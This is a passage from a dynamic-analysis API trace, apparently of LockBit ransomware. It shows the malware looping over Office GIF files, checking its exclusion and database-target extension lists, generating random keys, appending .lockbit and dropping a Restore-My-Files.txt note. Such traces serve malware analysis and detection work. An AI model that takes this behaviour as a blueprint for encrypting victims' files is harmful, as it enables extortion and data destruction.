(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.395] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.398] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.398] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.398] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.398] free (_Block=0x1fa2ed8) [0203.398] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.398] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.398] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.398] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafa9d00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfafa9d00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14792_.GIF", cAlternateFileName="")) returned 1 [0203.398] lstrcmpiW (lpString1=".", lpString2="BD14792_.GIF") returned -1 [0203.398] lstrcmpiW (lpString1="..", lpString2="BD14792_.GIF") returned -1 [0203.399] PathFindExtensionW (pszPath="BD14792_.GIF") returned=".GIF" [0203.399] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.399] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.399] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.400] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.400] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.400] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14792_.GIF") returned 1 [0203.400] lstrcmpiW (lpString1="ntldr", lpString2="BD14792_.GIF") returned 1 [0203.400] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14792_.GIF") returned 1 [0203.400] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14792_.GIF") returned 1 [0203.400] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14792_.GIF") returned -1 [0203.400] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14792_.GIF") returned 1 [0203.400] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14792_.GIF") returned 1 [0203.400] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.400] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF") returned=".GIF" [0203.400] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.400] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.400] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.401] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.401] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.401] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF.lockbit") returned 78 [0203.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14792_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.402] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.402] malloc (_Size=0x40068) returned 0x3df0008 [0203.402] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=251) returned 1 [0203.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.403] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.406] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.406] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.406] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.406] free (_Block=0x1fa2ed8) [0203.406] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14792_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.406] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.406] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.407] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2bca00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfc2bca00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14793_.GIF", cAlternateFileName="")) returned 1 [0203.407] lstrcmpiW (lpString1=".", lpString2="BD14793_.GIF") returned -1 [0203.407] lstrcmpiW (lpString1="..", lpString2="BD14793_.GIF") returned -1 [0203.407] PathFindExtensionW (pszPath="BD14793_.GIF") returned=".GIF" [0203.407] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.407] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.407] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14793_.GIF") returned 1 [0203.408] lstrcmpiW (lpString1="ntldr", lpString2="BD14793_.GIF") returned 1 [0203.408] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14793_.GIF") returned 1 [0203.408] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14793_.GIF") returned 1 [0203.408] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14793_.GIF") returned -1 [0203.408] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14793_.GIF") returned 1 [0203.408] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14793_.GIF") returned 1 [0203.408] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.408] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF") returned=".GIF" [0203.408] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.408] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.408] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.409] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.409] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.409] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.409] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.409] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.409] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.409] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF.lockbit") returned 78 [0203.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14793_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.410] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.410] malloc (_Size=0x40068) returned 0x3df0008 [0203.410] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=240) returned 1 [0203.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.411] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.414] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.414] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.414] free (_Block=0x1fa2ed8) [0203.414] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14793_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.414] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.414] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.415] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2bca00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfc2bca00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x103, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14794_.GIF", cAlternateFileName="")) returned 1 [0203.415] lstrcmpiW (lpString1=".", lpString2="BD14794_.GIF") returned -1 [0203.415] lstrcmpiW (lpString1="..", lpString2="BD14794_.GIF") returned -1 [0203.415] PathFindExtensionW (pszPath="BD14794_.GIF") returned=".GIF" [0203.415] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.415] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.415] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.416] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.416] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.416] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.416] 